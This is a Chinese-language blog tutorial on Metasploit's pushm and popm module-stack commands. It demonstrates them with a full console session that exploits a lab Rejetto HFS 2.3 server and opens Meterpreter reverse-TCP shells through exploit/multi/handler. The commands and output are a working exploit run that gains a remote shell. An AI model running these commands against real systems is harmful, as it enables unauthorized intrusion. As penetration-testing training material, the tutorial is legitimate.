Metasploit之——pushm和popm命令

最新推荐文章于 2024-02-27 09:30:28 发布

冰河

最新推荐文章于 2024-02-27 09:30:28 发布

阅读量2k

点赞数 1

分类专栏：精通渗透系列文章标签：渗透 Metasploit

本文链接：https://blog.csdn.net/l1028386804/article/details/86669440

版权

精通渗透系列专栏收录该内容

145 篇文章 305 订阅

订阅专栏

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86669440

使用pushm命令可以将当前模块放入模块栈中，而popm将位于栈顶的模块弹出。优势在于可以实现快捷操作，从而为测试者节省大量的时间和精力。

这里考虑一个场景：我们正在测试一台有多种漏洞的内部网络服务器，而且要对其中的所有系统都进行两种不同的渗透测试。为了能对每台服务器都进行这两种测试，我们就需要一个能在这两个渗透模块之间快速切换的机制。在这种情况下就可以使用pushm和popm命令。我们可以使用一个渗透模块对服务器的某个漏洞进行测试，然后将这个模块放入模块栈中，操作完成之后再载入另一个渗透模块。使用第二个模块完成任务之后，就可以使用popm命令将第一个模块(仍然保持之前的所有选项设置)从栈中弹出。

这里，我们在目标机上部署了HFS2.3服务，如下图：

接着，我们利用HFS 2.3的漏洞拿到目标机的Meterpreter。

msfconsole
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 192.168.175.130
RHOST => 192.168.175.130
msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Using URL: http://0.0.0.0:8080/SM65nXQp
[*] Local IP: http://192.168.175.128:8080/SM65nXQp
[*] Server started.
[*] Sending a malicious request to /
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Payload request received: /SM65nXQp
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1042) at 2019-01-25 15:41:58 +0800
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 2 opened (192.168.175.128:4444 -> 192.168.175.130:1051) at 2019-01-25 15:41:58 +0800
[!] Tried to delete %TEMP%\GjPFpxreCevs.vbs, unknown result
[*] Server stopped.

meterpreter >

接着，我们通过background命令将当前会话放入后台，利用pushm命令将模块放入栈中，然后利用 exploit/multi/handler 模块渗透目标主机，如下：

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/http/rejetto_hfs_exec) > pushm 
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 3 opened (192.168.175.128:4444 -> 192.168.175.130:1054) at 2019-01-25 15:46:53 +0800

meterpreter >

此时，我们就使用 pushm 命令将 windows/http/rejetto_hfs_exec 模块放到了栈中。并加载了 exploit/multi/handler 模块。当使用 exploit/multi/handler 模块完成操作之后，就可以使用popm命令从栈中再次加载 windows/http/rejetto_hfs_exec 模块，如下所示：

meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > popm
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.175.130  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Using URL: http://0.0.0.0:8080/8rkX9sv1CkhYsB
[*] Local IP: http://192.168.175.128:8080/8rkX9sv1CkhYsB
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /8rkX9sv1CkhYsB
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 4 opened (192.168.175.128:4444 -> 192.168.175.130:1067) at 2019-01-25 16:23:11 +0800

[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\gWZaxa.vbs' on the target

meterpreter >

从模块栈中弹出的windows/http/rejetto_hfs_exec跟之前的设置一样，所以无须再设置这个模块的选项了。

冰河

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
Metasploit之——pushm和popm命令

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86669440使用pushm命令可以将当前模块放入模块栈中，而popm将位于栈顶的模块弹出。优势在于可以实现快捷操作，从而为测试者节省大量的时间和精力。这里考虑一个场景：我们正在测试一台有多种漏洞的内部网络服务器，而且要对其中的所有系统都进行两种不同的渗透测试。为了能对每台...
复制链接

扫一扫